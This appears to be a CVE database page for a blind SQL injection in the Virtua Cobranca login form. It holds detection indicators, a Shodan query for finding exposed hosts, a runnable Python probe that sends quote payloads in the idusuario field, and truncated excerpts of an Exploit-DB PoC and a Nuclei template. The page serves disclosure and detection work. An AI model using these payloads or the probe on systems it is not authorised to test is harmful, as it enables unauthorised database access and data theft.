CVE-2021-37589
CVE-2021-37589: Virtua Cobranca before 12R allows SQL Injection on the login page.
Published 2022-06-07
Priority: P2 (66)
CVSS 3.1: 7.5 High (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
Exploit: public PoC available (see Exploit-DB entry below)
EPSS: 29.67% (98.0th percentile)
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| virtuasoftware | cobranca | < 12r | 12r |
Detection & IOCs (extracted from sources)
- URL: /controller/origemdb.php?idselorigem=ATIVOS
- Shodan query: http.favicon.hash:876876147
- Other: icon_hash=876876147
- An HTTP 500 response to a login POST that carries a single quote in the idusuario parameter indicates that the value reaches the SQL query unsanitized; a follow-up request with balanced quote syntax that returns HTTP 200 confirms the blind SQL injection point.
- Detection condition: status_code_2 == 500 (malformed quote payload) AND status_code_3 == 200 (balanced quote payload) on the login endpoint confirms the vulnerability.
- A response body in the third request containing the Portuguese application error strings 'Os parametros não estão informados corretamente' ("the parameters are not supplied correctly") or 'O CNPJ dos parametro não está informado corretamente' ("the CNPJ of the parameter is not supplied correctly") confirms a successful blind SQLi probe. Match on the original Portuguese strings, not the translations.
- The X-Requested-With: XMLHttpRequest header must be present on the login POST requests, otherwise the injection path is not reached.
- The public exploit runs sqlmap against the idusuario POST parameter; the backend DBMS is Firebird.
- The vulnerability is unauthenticated and requires no prior session: the PHPSESSID and origem_selecionado cookies are empty in the PoC.
- The NVD advisory lists the affected range as 'before 12R', while the Exploit-DB PoC was tested against version 12S, which is later than 12R. This suggests the flaw persisted beyond the reported boundary version, so the 'Fixed in: 12r' entry in the table above should be treated as unverified.
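The three-request differential described in the list above, as an added example (this is not code from the page, from the Nuclei template or from the exploit author): it builds the login POST with the X-Requested-With header, sends a plain value, a lone quote and a balanced pair of quotes in idusuario, and applies the 500/200 condition plus the error-string check. Assumptions: the page does not say what the first request is or which other form fields the login expects, so the first request is treated here as a plain baseline (used only to rule out an endpoint that returns 500 for any POST) and only idusuario is sent; `Response`, `build_request`, `send`, `classify` and `check` are names chosen for this example.

```python
"""Differential probe for CVE-2021-37589 (Virtua Cobranca login blind SQLi).

Added example, not the page's or the exploit author's code. Assumption: the
login handler accepts a bare idusuario form field; the role of the first
request (baseline) is an assumption, the page only numbers requests 2 and 3.
"""
from dataclasses import dataclass
from urllib.parse import urlencode
import urllib.error
import urllib.request

LOGIN_PATH = "/controller/login.php?acao=autenticar"

# Application error strings from the IOC list; matched verbatim (Portuguese).
ERROR_STRINGS = (
    "Os parametros não estão informados corretamente",
    "O CNPJ dos parametro não está informado corretamente",
)

# Probe sequence: a plain value, a value that breaks the SQL string literal
# (expected 500) and one that keeps the literal balanced (expected 200).
PROBES = (("baseline", "admin"), ("malformed", "admin'"), ("balanced", "admin''"))


@dataclass
class Response:
    status: int
    body: str


def build_request(base_url: str, idusuario: str) -> urllib.request.Request:
    """Build the login POST as the PoC sends it: form-encoded, AJAX header, no cookies."""
    data = urlencode({"idusuario": idusuario}).encode()
    req = urllib.request.Request(base_url.rstrip("/") + LOGIN_PATH, data=data, method="POST")
    req.add_header("Content-Type", "application/x-www-form-urlencoded")
    # Without this header the injection path is not reached (see IOC list).
    req.add_header("X-Requested-With", "XMLHttpRequest")
    return req


def send(req: urllib.request.Request) -> Response:
    """Return status and body even for 4xx/5xx, which urllib raises as HTTPError."""
    try:
        with urllib.request.urlopen(req, timeout=10) as r:
            return Response(r.status, r.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as e:
        return Response(e.code, e.read().decode("utf-8", "replace"))


def classify(baseline: Response, malformed: Response, balanced: Response) -> str:
    """Apply the detection condition from the IOC list.

    'confirmed'      - malformed quote -> 500 AND balanced quotes -> 200 AND one of
                       the application error strings appears in the balanced response
    'likely'         - the 500/200 status differential only, no error string
    'not_vulnerable' - anything else, including a 500 on the baseline request,
                       which means the endpoint errors on any POST (assumption:
                       such a host cannot be judged by the status differential)
    """
    if baseline.status == 500:
        return "not_vulnerable"
    if malformed.status == 500 and balanced.status == 200:
        if any(s in balanced.body for s in ERROR_STRINGS):
            return "confirmed"
        return "likely"
    return "not_vulnerable"


def check(base_url: str) -> str:
    """Run the three probes against a live host and classify the result."""
    results = {label: send(build_request(base_url, value)) for label, value in PROBES}
    return classify(results["baseline"], results["malformed"], results["balanced"])


if __name__ == "__main__":
    import sys
    print(check(sys.argv[1]))  # e.g. python probe.py http://host.example
```

The `likely` state exists because the status differential alone can be produced by unrelated server-side errors; only the error strings from the Cobranca application tie the 200 response to the injected SQL actually executing, which is what the Exploit-DB PoC relies on before handing the parameter to sqlmap.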
CVSS provenance
- NVD v3.1: 7.5 HIGH, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- NVD v2.0: 5.0 MEDIUM, AV:N/AC:L/Au:N/C:P/I:N/A:N
No detection rules found.
Exploit-DB
Virtua Software Cobranca 12S - SQLi (exploitdb, 2022-06-14, CVSS 7.5, HIGH)
---
# Exploit Title: Virtua Software Cobranca 12S - SQLi
# Shodan Query: http.favicon.hash:876876147
# Date: 13/08/2021
# Exploit Author: Luca Regne
# Vendor Homepage: https://www.virtuasoftware.com.br/
# Software Link: https://www.virtuasoftware.com.br/downloads/Cobranca12S_13_08.exe
# Version: 12S
# Tested on: Windows Server 2019
# CVE : CVE-2021-37589
## Description
A blind SQL injection vulnerability in the login page (/controller/login.php) of Virtua Cobranca version 12S allows remote unauthenticated attackers to obtain information from the application by executing arbitrary SQL commands through the idusuario parameter.
## Request PoC
```
POST /controller/login.php?acao=autenticar HTTP/1.1
Host: redacted.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:90.0) Gec
```
Nuclei
Virtua Software Cobranca <12R - Blind SQL Injection (nuclei, CVSS 7.5, HIGH)
Virtua Cobranca before 12R allows blind SQL injection on the login page.
Template:
```yaml
id: CVE-2021-37589
info:
  name: Virtua Software Cobranca <12R - Blind SQL Injection
  author: princechaddha
  severity: high
  description: |
    Virtua Cobranca before 12R allows blind SQL injection on the login page.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the underlying system.
  remediation: |
    Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in Virtua Software Cobranca <12R.
  reference:
    - https://github.com/luca-regne/my-cves/tree/main/CVE-2021-37589
    - https://www.virtuasoftware.com.br/
    - https://www.virtuasoftware.com.br/cont
```
No writeups or analysis indexed.
References
- http://packetstormsecurity.com/files/167480/Virtua-Software-Cobranca-12S-SQL-Injection.html
- https://github.com/luca-regne/my-cves/tree/main/CVE-2021-37589
- https://www.virtuasoftware.com.br/conteudo.php?content=downloads&lang=pt-br